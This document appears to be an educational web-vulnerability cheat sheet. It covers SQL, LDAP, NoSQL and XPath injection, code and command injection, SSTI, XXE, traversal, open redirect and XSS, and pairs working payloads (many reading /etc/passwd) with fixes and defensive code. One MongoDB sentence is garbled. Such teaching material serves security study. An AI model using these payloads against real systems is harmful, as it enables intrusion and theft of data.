Web Basics: Common Vulnerabilities and Exploitation Techniques

Understanding the core vulnerabilities in web applications is essential for both offensive and defensive security. From SQL injection to cross-site scripting (XSS), server-side template injection (SSTI), and command execution, these flaws often stem from improper input handling and insecure coding practices.

This guide covers fundamental web-based attacks and exploitation techniques, helping you identify and reduce your organization's attack surface by uncovering common weaknesses.

MySQL: Trailing Space Ignorance

With MySQL's PAD SPACE collations (the historical defaults such as latin1_swedish_ci and utf8mb4_general_ci), trailing spaces are not significant when CHAR and VARCHAR values are compared with =, so:

'pentesterlab' = 'pentesterlab   '

evaluates to true. This can be exploited in authentication bypasses and logic flaws: if an application lets you register or look up a name such as 'admin ' (with trailing spaces), every = comparison against it also matches the existing 'admin' row, even though the two strings are different to the application code that handles them. Two caveats: MySQL 8.0's default collation utf8mb4_0900_ai_ci is NO PAD and does compare trailing spaces, and LIKE never ignores them, so check the target's actual collation before relying on this.

Authorization Bypass via Parameter Injection (Mass Assignment)

If an application uses array-like parameters:

user[username]=test&user[password]=test

You can inject:

user[username]=test&user[admin]=true

This elevates privileges when the backend binds every submitted key onto the user record without an allowlist (Rails update_attributes(params[:user]) before strong parameters, PHP extract($_POST['user']), or any generic "for each submitted key, set the attribute" loop). Try any attribute name the model plausibly has: admin, role, is_staff, verified.
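The following is an added example, not code from the page: a minimal parser for the bracketed parameter style above, followed by the mass-assignment update beside its allowlisted form. The record layout, the allowed field names and the function names are assumptions.

```python
from urllib.parse import parse_qsl

# Added example, not code from the page: a minimal Rails/PHP-style
# "user[field]=value" parameter parser and two ways a backend can apply
# the result to a record.  Field names and the record layout are assumed.

def parse_bracket_params(query: str) -> dict:
    """Turn 'user[username]=test&user[admin]=true' into
    {'user': {'username': 'test', 'admin': 'true'}} (one nesting level)."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            outer, inner = key[:-1].split("[", 1)
            params.setdefault(outer, {})[inner] = value
        else:
            params[key] = value
    return params

# Fields the profile form is meant to change; 'admin' is deliberately absent.
ALLOWED_USER_FIELDS = {"username", "password"}

def update_user_vulnerable(record: dict, params: dict) -> dict:
    # Mass assignment: every submitted attribute is written to the record,
    # so user[admin]=true flips the privilege flag.
    record.update(params.get("user", {}))
    return record

def update_user_safe(record: dict, params: dict) -> dict:
    # Allowlist (the idea behind Rails strong parameters): copy only the
    # fields the form is supposed to set and ignore everything else.
    submitted = params.get("user", {})
    for field in set(submitted) & ALLOWED_USER_FIELDS:
        record[field] = submitted[field]
    return record

def demo(query: str):
    """Apply the same query string both ways to a fresh non-admin record."""
    params = parse_bracket_params(query)
    vulnerable = update_user_vulnerable({"username": "x", "admin": False}, params)
    safe = update_user_safe({"username": "x", "admin": False}, params)
    return vulnerable, safe
```

The allowlist is the whole fix: the parser is the same in both paths, so the difference between the two records after demo() is exactly the one field the attacker added.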

Code Execution Detection

To confirm code injection (e.g., in PHP), use these techniques:

  • String concatenation: replace the input with "."ha"."cker"." (close the string, concatenate, reopen it). If the page reflects the word hacker intact, the quotes and dots were parsed as PHP rather than echoed back, which confirms the injection.
  • Comments: insert /*random*/ into the input. If the response is unchanged, the comment was swallowed by the PHP parser, which means your input is being compiled as code.
  • Inject a payload that fits the context. When the input sits inside a double-quoted string, close it and add a statement:
{url}/?name=".system('cat /etc/passwd');"
    When the input sits inside a call within a dynamically built function body (for example a sort callback), close the call and the body first, then comment out the remainder:
{url}?order=id);}system('cat /etc/passwd');//

PHP: Dangerous PCRE_REPLACE_EVAL (/e modifier)

The /e modifier in preg_replace evaluates the replacement string as PHP code for every match (after backreferences such as $1 have been substituted into it):

preg_replace('/pattern/e', $_GET['input'], 'text');   // $_GET['input'] is executed as PHP

The same applies when the user controls the pattern rather than the replacement (a search-and-replace feature): appending /e to the expression turns a fixed replacement into code. Note: the modifier was deprecated in PHP 5.5.0 because of this risk and removed in PHP 7.0; code that needs dynamic replacements should use preg_replace_callback() instead.

Python: Code Injection in Templates

In Python-based apps (e.g., Flask) where the parameter is spliced into source code that is passed to eval or exec, the double quote closes the string literal and %2b (a URL-encoded +) concatenates the command output onto it. Try:

{url}/hello/hacker"%2b str(os.popen('cat /etc/passwd').read())%2b"

If os is not imported in that module, pull it in with __import__:

{url}/hello/hacker"%2bstr(__import__('os').popen('cat /etc/passwd').read())%2b"

Or Base64-encode the command to bypass keyword filters (Y2F0IC9ldGMvcGFzc3dk decodes to cat /etc/passwd):

{url}/hello/hacker"%2bstr(__import__('os').popen(__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dk')).read())%2b"

Note: these payloads were written for Python 2. On Python 3, b64decode returns bytes and os.popen only accepts str, so add .decode() after b64decode(...). Keep the surrounding quotes matched; otherwise the server answers with a SyntaxError instead of running anything.
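An added example, not code from the page: the kind of handler these payloads target, written vulnerable and fixed, together with the concatenation probe from the detection section applied to Python. The greeting format, the function names and the harmless Base64 value ("hi" instead of a command) are assumptions made so that the block runs without touching the file system.

```python
from urllib.parse import unquote

# Added example, not code from the page: the kind of handler the payloads
# above target, shown vulnerable and fixed.  The greeting format and the
# function names are assumptions.

def hello_vulnerable(name: str) -> str:
    # The request value is spliced into Python source that is then
    # evaluated, so a double quote in `name` ends the string literal and
    # whatever follows runs as code.
    return eval('"Hello " + "' + name + '"')

def hello_safe(name: str) -> str:
    # Plain string handling: `name` is data, never code.
    return "Hello " + name

# Detection probe: if the reflected greeting shows "hacker" as one word,
# the quotes and '+' were interpreted as Python, not echoed back.
CONCAT_PROBE = 'hac"+"ker'

# Exploit payload as it appears in the URL (%2b is '+').  The Base64 string
# decodes to "hi" so the block is harmless; on Python 3 the decoded bytes
# need .decode() before they could be used as a command string.
URL_PAYLOAD = 'hacker"%2bstr(__import__(\'base64\').b64decode(\'aGk=\').decode())%2b"'

def decoded_payload() -> str:
    """What the application sees after URL decoding."""
    return unquote(URL_PAYLOAD)
```

hello_vulnerable(decoded_payload()) evaluates the attacker's __import__ chain and appends its result to the greeting, while hello_safe returns the payload text unchanged, which is exactly the difference the probe input is designed to reveal.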

Ruby: Command Injection

In Ruby CGI scripts that evaluate a string built around the parameter (eval or instance_eval on a single-quoted literal), close the quote, append an expression, and reopen it (the + in the URL is an encoded space):

{url}/cgi-bin/hello?name=hacker'.cat+/etc/passwd.'

This executes cat /etc/passwd if the input is interpolated unsafely: in Ruby a command wrapped in backticks is run through the shell and its output is returned as a string, so putting `cat /etc/passwd` at the injection point makes the file contents part of the response.

Command Execution Techniques

When a parameter ends up in a shell command, chain commands using shell operators:

  • command1 && command2 - run the second only if the first succeeds
  • command1 || command2 - run the second only if the first fails
  • command1 ; command2 - run both sequentially, regardless of exit status
  • command1 | command2 - pipe the output of the first into the second
  • command1 & command2 - run the first in the background, then the second (also useful when ; is filtered)

Example:

ping=127.0.0.1; cat /etc/passwd

Use command substitution when the injected value must stay inside a single argument; the output of the inner command becomes part of the command line:

ping=`cat /etc/passwd`
ping=$(cat /etc/passwd)

If the input lands inside quotes, close them first (127.0.0.1'; cat /etc/passwd; ' or the double-quote equivalent), and a URL-encoded newline (%0a) also separates commands when the usual operators are filtered.
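An added example, not code from the page: the ping feature implied by the ping= parameter above, built with a shell (injectable), without a shell (argv list), and with input validation. echo stands in for ping so the block runs offline; it assumes a POSIX /bin/sh, and the function names are assumptions.

```python
import ipaddress
import subprocess

# Added example, not code from the page: a "ping" feature built three ways.
# `echo` stands in for ping so the block runs offline on a POSIX system;
# what matters is how the host parameter reaches the command.

def ping_vulnerable(host: str) -> str:
    # shell=True hands the string to /bin/sh, so ';', '&&', '||', '|',
    # backticks and $( ) inside `host` are interpreted by the shell.
    return subprocess.run("echo " + host, shell=True,
                          capture_output=True, text=True).stdout

def ping_argv(host: str) -> str:
    # No shell: `host` is one argv element and metacharacters stay literal.
    return subprocess.run(["echo", host],
                          capture_output=True, text=True).stdout

def validate_host(host: str) -> str:
    # Allowlist the value type the feature actually needs; anything that is
    # not a bare IP address is rejected before a command is built.
    return str(ipaddress.ip_address(host))   # raises ValueError otherwise

def ping_safe(host: str) -> str:
    return ping_argv(validate_host(host))
```

The argv form alone already defeats every operator in the list above; the validator is still worth having because the underlying program may interpret its own argument (a host beginning with - is an option to ping).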

Directory Traversal

Access restricted files by walking up from the directory the application reads from with ../ sequences; use enough of them to reach the root, extra ones are harmless:

../../../../etc/passwd

Use a null byte to terminate the path early (if the runtime is vulnerable):

../../../../etc/passwd%00

Useful when the backend appends an extension (e.g., .php) to user input: a C-based runtime stops reading the string at the NUL, so the appended extension is ignored. PHP rejects paths containing NUL bytes since 5.3.4, so this mainly applies to older PHP versions and to other languages that hand the string to C APIs. If ../ is filtered, try URL encoding (%2e%2e%2f), double encoding (%252e%252e%252f), or ....// where the filter strips ../ only once.
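An added example, not code from the page: the "append an extension" handler described above in its traversal-prone form, beside a resolver that rejects NUL bytes and anything that leaves the base directory. BASE_DIR and the file names are assumptions, and the paths are POSIX.

```python
import os

# Added example, not code from the page: a handler that appends ".php" to
# a user-supplied name, in its traversal-prone form and a hardened form.
# BASE_DIR and the file names are assumptions; paths are POSIX.

BASE_DIR = os.path.realpath("/var/www/app/templates")

def build_path_vulnerable(name: str) -> str:
    # Equivalent to include($name . ".php"): '../' is honoured, and in a
    # runtime that treats strings as NUL-terminated a %00 would also cut
    # the appended extension off.
    return os.path.join(BASE_DIR, name + ".php")

def escapes_base(name: str) -> bool:
    """Does the vulnerable path, once resolved, point outside BASE_DIR?"""
    resolved = os.path.realpath(build_path_vulnerable(name))
    return os.path.commonpath([BASE_DIR, resolved]) != BASE_DIR

def resolve_safe(name: str) -> str:
    """Return the resolved path, or raise ValueError if it leaves BASE_DIR."""
    if "\x00" in name:
        raise ValueError("NUL byte in file name")
    candidate = os.path.realpath(os.path.join(BASE_DIR, name + ".php"))
    # commonpath catches '../' escapes and also prefix tricks such as
    # /var/www/app/templates_private that a startswith() check would miss.
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError("path escapes base directory: " + candidate)
    return candidate
```

Resolving with realpath before comparing is what makes the check robust: it canonicalises ../ and symlinks, so the decision is made on the path that would actually be opened rather than on the string the client sent.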

LDAP Injection

LDAP search filters use prefix notation with logical operators:

  • OR: (|(cn=input1)(cn=input2))
  • AND: (&(cn=input1)(userPassword=password))

A login that builds (&(cn=USERNAME)(userPassword=PASSWORD)) by concatenation can be broken out of. Example bypass:

username=hacker)(cn=*))%00&password=anything

Resulting filter:

(&(cn=hacker)(cn=*))%00(userPassword=anything))

The parentheses after hacker close the cn clause and the outer AND, and the null byte truncates the string in C-based LDAP libraries (older PHP ldap_search builds, for instance), so the server never sees the userPassword clause. The effective filter is (&(cn=hacker)(cn=*)), which matches the hacker entry regardless of password, so you are authenticated as hacker without knowing it. Using *)(cn=*))%00 as the username instead matches every entry. The fix is to escape ( ) * \ and NUL in values as RFC 4515 requires, or better, to bind to the directory as the user instead of comparing passwords inside a filter.

MongoDB Injection

When user input is concatenated into a $where clause (JavaScript evaluated by the database), or becomes ||. Close the string, add an always-true condition, and use a null byte to cut off the rest of the expression (works where the driver truncates the string at NUL, as older PHP drivers did):

' || 1==1 %00

Or use a JavaScript comment to ignore the rest:

' || 1==1 //

Where the input is passed as a query object rather than a string, the equivalent is operator injection: sending username[$ne]=x&password[$ne]=x turns each equality into a {$ne: "x"} condition that matches every document.

Open Redirect

When a redirect parameter is only checked for a leading slash or for the absence of a scheme, replace the domain with a scheme-relative URL (double slash), which the browser resolves with the current protocol:

https://example.com/redirect?url=//attacker.com

The browser is sent to https://attacker.com, which is useful for phishing from a trusted domain or for stealing OAuth codes and tokens when the redirect is part of a login flow; if a server-side component fetches the URL instead of the browser, the same trick turns into SSRF. Variants worth trying against naive checks: /\attacker.com (browsers treat the backslash as a slash), https://example.com.attacker.com, and https://example.com@attacker.com.
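An added example, not code from the page: a redirect-target check that accepts only same-site relative paths and rejects the scheme-relative and backslash variants above. The parameter handling and the fallback path are assumptions.

```python
from urllib.parse import urlsplit

# Added example, not code from the page: a redirect-target check that only
# accepts same-site relative paths.  The fallback path is an assumption.

def is_safe_redirect(target: str) -> bool:
    if not target or "\\" in target:
        # Browsers treat '\' like '/', so '/\attacker.com' is scheme-relative too.
        return False
    if any(ord(ch) < 0x20 for ch in target):
        # Tabs and newlines are stripped by browsers but can confuse a parser.
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Rejects 'https://attacker.com', 'javascript:...' and '//attacker.com'
        # (urlsplit puts 'attacker.com' in netloc for the last one).
        return False
    # Must be an absolute path on this site, and not a second '//' form.
    return target.startswith("/") and not target.startswith("//")

def redirect_target(requested: str, fallback: str = "/") -> str:
    """Where to send the user: the requested path if safe, else the fallback."""
    return requested if is_safe_redirect(requested) else fallback
```

The check is deliberately an allowlist of one shape (a path beginning with a single slash) rather than a denylist of known tricks; the explicit backslash and control-character tests cover the cases where browser URL parsing is more lenient than urlsplit.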

SQL Injection: MySQL Login Bypass

Bypass login with:

admin' OR 1=1 LIMIT 1--

The quote closes the username literal, OR 1=1 makes the WHERE clause true for every row, LIMIT 1 keeps applications that reject multiple results happy, and the comment removes the password check. In MySQL a -- comment must be followed by a space (send it URL-encoded as --%20 or --+) or use # instead; without it the trailing quote from the query template causes a syntax error.

Or exploit the GBK character set (a multibyte Chinese encoding) to smuggle an unescaped quote past addslashes() or mysql_real_escape_string() when the connection charset was switched with a raw query:

SET CHARACTER SET 'GBK';

Send %bf%27: the escaping function turns the quote into the bytes \xbf\x5c\x27 (0xbf, backslash, quote), and MySQL, decoding GBK, treats 0xbf5c as one two-byte character, leaving a bare single quote:

admin%bf%27 or 1=1#

(spaces URL-encoded as needed). On the PHP side the fix is to set the charset through the API (mysqli_set_charset()) so the escaping routine knows the encoding, or better, to use prepared statements.
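An added example, not code from the page: a login check built by string concatenation beside the parameterised version, run against an in-memory SQLite database with constructed rows. SQLite stands in for MySQL here (it accepts the payload above as-is because it does not require the space after --); the table layout and function names are assumptions.

```python
import sqlite3

# Added example, not code from the page: a login check built by string
# concatenation beside the parameterised version.  SQLite stands in for
# MySQL; the table rows are constructed.

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username: str, password: str):
    # The quotes come from the template, so a quote in `username` ends the
    # literal early and the rest of the input becomes SQL.
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username: str, password: str):
    # Placeholders: the driver sends values separately from the statement,
    # so no quoting or charset trick can change the query's structure.
    row = conn.execute("SELECT username FROM users WHERE username = ? "
                       "AND password = ?", (username, password)).fetchone()
    return row[0] if row else None
```

The GBK trick from the section above does not apply to the parameterised form either: once values travel separately from the statement there is no escaping step for a multibyte sequence to defeat.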

Server-Side Template Injection (SSTI)

Jinja2 (Flask):

{{''.__class__.__mro__[2].subclasses()[233]("id", shell=True, stdout=-1).communicate()}}

This walks from the str class up to object, lists object's subclasses, and picks the one that is subprocess.Popen (stdout=-1 is subprocess.PIPE). Three things must be adapted to the target: the method is __subclasses__() with double underscores; on Python 3 str's MRO is (str, object), so use __mro__[1] or ''.__class__.__base__ rather than __mro__[2] (a Python 2 index); and the subclass index (233 here) depends on the interpreter version and on which modules the application has imported, so enumerate {{''.__class__.__base__.__subclasses__()}} first and look for Popen.

Twig (PHP):

{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}

This registers PHP's exec as the callback for unknown filter names, so asking for a filter called id runs exec('id'). It works on Twig 1.x; from Twig 2 onwards _self is just the template name and no longer exposes the environment.
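An added example, not code from the page: the object walk the Jinja2 payload performs, done in plain Python so that the Popen index is looked up instead of hard-coded. It assumes subprocess is imported in the process (as it is in most Flask deployments) and a POSIX system where echo exists; the function names are assumptions.

```python
import subprocess  # imported so that Popen is among object's subclasses

# Added example, not code from the page: the object walk the Jinja2
# payload performs, done in plain Python so the unstable index can be
# looked up instead of hard-coded.  Runs `echo` on a POSIX system.

def popen_gadget():
    """Return (index, class) for subprocess.Popen in object.__subclasses__(),
    which is what ''.__class__.__base__.__subclasses__()[N] selects in a
    template.  The index differs between Python builds and import orders,
    which is why a payload copied from elsewhere often hits the wrong class."""
    for index, cls in enumerate(object.__subclasses__()):
        if cls.__name__ == "Popen" and cls.__module__ == "subprocess":
            return index, cls
    raise LookupError("subprocess.Popen not loaded in this process")

def run_via_gadget(argv) -> bytes:
    # Same call shape as the payload: stdout=-1 is subprocess.PIPE.
    _, popen = popen_gadget()
    return popen(argv, stdout=-1).communicate()[0]
```

Inside a template the same search is written as a loop over ''.__class__.__base__.__subclasses__() comparing __name__, which is more reliable than guessing the index.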

XML External Entity (XXE) Injection

Read local files via a DTD: declare an external entity whose SYSTEM identifier is the file, then reference it where the parser will echo the value back (the element name below is arbitrary):

<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<data>&x;</data>

The parser replaces &x; with the file contents when it builds the document, so the file appears wherever the application reflects that element's value.
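An added example, not code from the page: how a DTD-trusting parser treats an entity, beside a front-end that refuses any document carrying a DTD, which is the standard way to close XXE and entity-expansion attacks. Python's expat-based ElementTree is used; it expands internal entities but does not fetch SYSTEM ones, so the external case fails to parse here where libxml2-based parsers (lxml, PHP) would read the file. The element names and the two test documents are constructed.

```python
import xml.etree.ElementTree as ET

# Added example, not code from the page: what a DTD-trusting parser does
# with an entity, and a parser front-end that refuses DTDs outright.
# Element names and the test documents are constructed.

INTERNAL_ENTITY = '<!DOCTYPE data [<!ENTITY x "expanded">]><data>&x;</data>'
EXTERNAL_ENTITY = ('<!DOCTYPE data [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
                   '<data>&x;</data>')

def entity_text(xml_text: str):
    """Parse with default ElementTree settings and return the root text.
    Internal entities are expanded; expat does not fetch SYSTEM entities,
    so that document fails to parse here (libxml2-based parsers such as
    lxml or PHP's would read the file instead)."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError:
        return None

def parse_untrusted(xml_text: str) -> ET.Element:
    # Hardened front-end: a DOCTYPE can only appear before the root element
    # and the keyword is case-sensitive, so rejecting the literal token
    # removes every entity-based attack (external, billion-laughs, parameter).
    # Works on decoded text; decode bytes first so a UTF-16 document cannot
    # hide the token.
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise ValueError("DTD not allowed in untrusted XML")
    return ET.fromstring(xml_text)
```

Rejecting the DTD wholesale is simpler and safer than trying to switch off individual entity features, which differ by parser and are easy to get wrong.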

XPath Injection

Similar to SQLi, compare the responses against the unmodified query to confirm the injection:

  • ' and '1'='1 > same results as the original query
  • ' or '1'='0 > same results as the original query
  • ' and '1'='0 > no results
  • ' or '1'='1 > all results

Unlike SQL, XPath 1.0 has no comment syntax, so to discard the remainder of the expression rely on a null byte (honoured where the application passes the string to a C library such as libxml2):

hacker' or 1=1]/parent::*/child::node()%00

The ] closes the predicate the input sits in; parent::*/child::node() then selects every node under the parent, dumping the whole document when the result is reflected.

Cross-Site Scripting (XSS)

Basic XSS: inject script markup into a reflected parameter and check whether it comes back unescaped in the response, noting which context it lands in (element body, attribute value, or an existing script block), since the closing syntax differs for each.

Use String.fromCharCode() to obfuscate: build the string the script needs from character codes so the payload contains no quotes or angle brackets, which gets past filters that only look for those characters.

DOM-based exfiltration: script running in the victim's browser can read document.cookie or page content and send it to a server you control, for example by pointing an image's src at a URL that carries the data.
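An added example, not code from the page: a reflected greeting rendered with and without output encoding, plus a helper that rewrites a JavaScript string as the String.fromCharCode() call mentioned above. It assumes the HTML body context; attribute and script contexts need their own encoders, and the function names are assumptions.

```python
import html

# Added example, not code from the page: reflection with and without
# output encoding, and the String.fromCharCode() rewrite used to avoid
# quotes and angle brackets in a payload.

def render_vulnerable(name: str) -> str:
    # The value is concatenated straight into the HTML body.
    return "<p>Hello " + name + "</p>"

def render_safe(name: str) -> str:
    # Context-aware encoding for the HTML body: <, >, &, " and ' become
    # entities, so markup in `name` is displayed rather than parsed.
    return "<p>Hello " + html.escape(name, quote=True) + "</p>"

def to_fromcharcode(js_string: str) -> str:
    """Rewrite a JavaScript string literal as String.fromCharCode(...):
    the result contains only letters, digits, commas and parentheses."""
    codes = ",".join(str(ord(ch)) for ch in js_string)
    return "String.fromCharCode(" + codes + ")"

def is_reflected_as_markup(rendered: str, payload: str) -> bool:
    """Detection check: did the payload survive unencoded in the output?"""
    return payload in rendered
```

The obfuscation only helps against a filter that inspects the input; it does nothing against output encoding, which is why render_safe() neutralises both the plain and the encoded form of the payload.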


Published on Aug 21, 2025